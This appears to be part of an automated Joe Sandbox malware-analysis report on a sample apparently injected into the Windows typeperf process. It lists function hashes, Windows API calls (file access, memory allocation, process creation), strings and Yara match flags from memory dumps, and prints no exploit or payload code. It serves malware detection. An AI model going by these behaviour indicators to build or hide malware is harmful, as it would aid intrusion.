                                                                                                                        • Opcode ID: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction ID: 372f373fc8f133473bc4d24e493a1308e3b2c3fd3af1d8bc7b07828fec0686b4
                                                                                                                        • Opcode Fuzzy Hash: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction Fuzzy Hash: BD3196B1A0074CFBDB20DFA0CC86FFF77BDAB44755F10455CB608A6281E674AA558BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,000000CA,?,?,?,?,?,?,?), ref: 00704D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction ID: 58eb91e3caa022c11d3993ca8184715d5fd344b9919f2a552c8971916acb7c70
                                                                                                                        • Opcode Fuzzy Hash: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction Fuzzy Hash: F821D0B2211549BFDB54DF99DC95EEB73EEAF8C714F008208FA0997241D634E851CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,000000CA,?,?,?,?,?), ref: 00704E81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction ID: b97db5f64da270eaa33d0ab0ac49c054b6826881ad751723bfbda37d901cfa88
                                                                                                                        • Opcode Fuzzy Hash: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction Fuzzy Hash: 472104B2200649AFDB14DF99DC81EEB73EDEF8C714F008208FA19A7241D634F9118BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(006F1888,?,006F1F99,00000000,00000004,00003000,00000004,00000000,006F1F99,?,006F1888,006F1F99,?), ref: 007050D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00704F44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 006F0797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 006F0797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0070228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 006F8A06
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3188754299-2766056989
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,Cso,00000010,?,?,?,00000044,?,00000010,006F7343,?,?,?), ref: 00705303
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
